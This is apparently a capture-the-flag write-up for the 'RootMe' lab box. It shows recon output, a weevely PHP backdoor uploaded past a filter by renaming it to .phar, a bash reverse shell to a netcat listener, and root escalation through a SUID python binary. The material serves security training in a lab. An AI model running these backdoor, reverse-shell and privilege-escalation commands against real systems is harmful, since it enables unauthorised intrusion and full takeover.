Post

RootMe

RootMe

Autorecon

1
2
3
4
┌──(kali㉿kali)-[~/thm]
└─$ sudo $(which autorecon) 10.10.148.99 -v
[*] Identified service ssh on tcp/22 on 10.10.148.99
[*] Identified service http on tcp/80 on 10.10.148.99

80 - HackIT - Home

Info

Dir

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/thm]
└─$ feroxbuster -u http://10.10.148.99 --burp
301      GET        9l       28w      314c http://10.10.148.99/uploads => http://10.10.148.99/uploads/
301      GET        9l       28w      310c http://10.10.148.99/css => http://10.10.148.99/css/
200      GET      105l      188w     1697c http://10.10.148.99/css/home.css
200      GET      100l      161w     1611c http://10.10.148.99/css/panel.css
301      GET        9l       28w      309c http://10.10.148.99/js => http://10.10.148.99/js/
301      GET        9l       28w      312c http://10.10.148.99/panel => http://10.10.148.99/panel/
200      GET       11l       22w      263c http://10.10.148.99/js/maquina_de_escrever.js
200      GET       25l       44w      616c http://10.10.148.99/

Get User & Root


An upload page

Generate weevly backdoor

1
2
3
┌──(kali㉿kali)-[~/thm]
└─$ weevely generate x w
Generated 'w' with password 'x' of 687 byte size.

It will block php files

Use .phar to bypass

1
2
┌──(kali㉿kali)-[~/thm]
└─$ mv w.php w.phar

Successfully uploaded

Reverse shell

1
2
3
┌──(kali㉿kali)-[~/thm]
└─$ weevely http://10.10.148.99/uploads/w.phar x
www-data@rootme:/var/www/html/uploads $ /bin/bash -c "/bin/bash -i >& /dev/tcp/10.11.19.145/1111 0>&1"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.11.19.145] from (UNKNOWN) [10.10.148.99] 49580
bash: cannot set terminal process group (913): Inappropriate ioctl for device
bash: no job control in this shell
www-data@rootme:/var/www/html/uploads$ python3 -c "import pty;pty.spawn('/bin/bash')"
<ads$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@rootme:/var/www/html/uploads$ ^Z
zsh: suspended  nc -lvnp 1111

┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
[1]  + continued  nc -lvnp 1111

www-data@rootme:/var/www/html/uploads$ find / -type f -perm -u=s+ 2>/dev/null
...
/usr/bin/python
...

www-data@rootme:/var/www/html/uploads$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
bash-4.4# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
This post is licensed under CC BY 4.0 by the author.